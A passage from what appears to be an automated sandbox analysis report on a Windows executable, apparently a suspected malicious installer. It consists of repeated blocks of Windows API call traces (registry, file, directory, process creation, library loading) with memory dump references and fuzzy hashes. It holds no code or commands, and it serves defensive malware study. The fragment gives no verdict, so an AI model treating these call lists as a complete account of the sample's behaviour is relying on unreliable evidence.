                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00660550), ref: 00401C10
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(?,00000804), ref: 00401C22
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                                                                                                                    • String ID: Call
                                                                                                                                                                                                                                    • API String ID: 3394109436-1824292864
                                                                                                                                                                                                                                    • Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                                                                                                                                                                                    • Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                                                                                                    • Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                                                                                                                                                                                    • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                    • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                                                                                                                                                                                    • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                    • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                    • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                                                                                                                                                                                    • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDeleteValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2831762973-0
                                                                                                                                                                                                                                    • Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                                                                                                                                                                                    • Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405C26
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                                                                    • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                                                                                    • Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3712363035-0
                                                                                                                                                                                                                                    • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                                                                                                                                                                                    • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,00403755,?,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                                                                                                                                                                                      • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                                                                                                                                                                                      • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                                                                                                                                                                                                      • Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 00406A6C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                                                                                                                    • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                                                                                                                                                                                    • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\2T10XBqS6g.exe,80000000,00000003), ref: 00406176
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                    • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                                                                                    • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 00405C36
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00405C44
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                                                                    • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                                                                                                                    • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000), ref: 70252C57
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                    • Opcode ID: d363662ffb294b1f85d0834bcb324f6cdce00055bb9c25c8ab720d4ab9d9c42e
                                                                                                                                                                                                                                    • Instruction ID: b1adbe01c03b0aff87fa43d04b9cb9bcd11a3acb756230ca9f9c9bc80f0da1a7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d363662ffb294b1f85d0834bcb324f6cdce00055bb9c25c8ab720d4ab9d9c42e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83417B73500215DFDB119F65DD9AB5D3778EB0A324F3084EAF405C61E0D638A8ACAB9D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                                                                                                                                                                                      • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
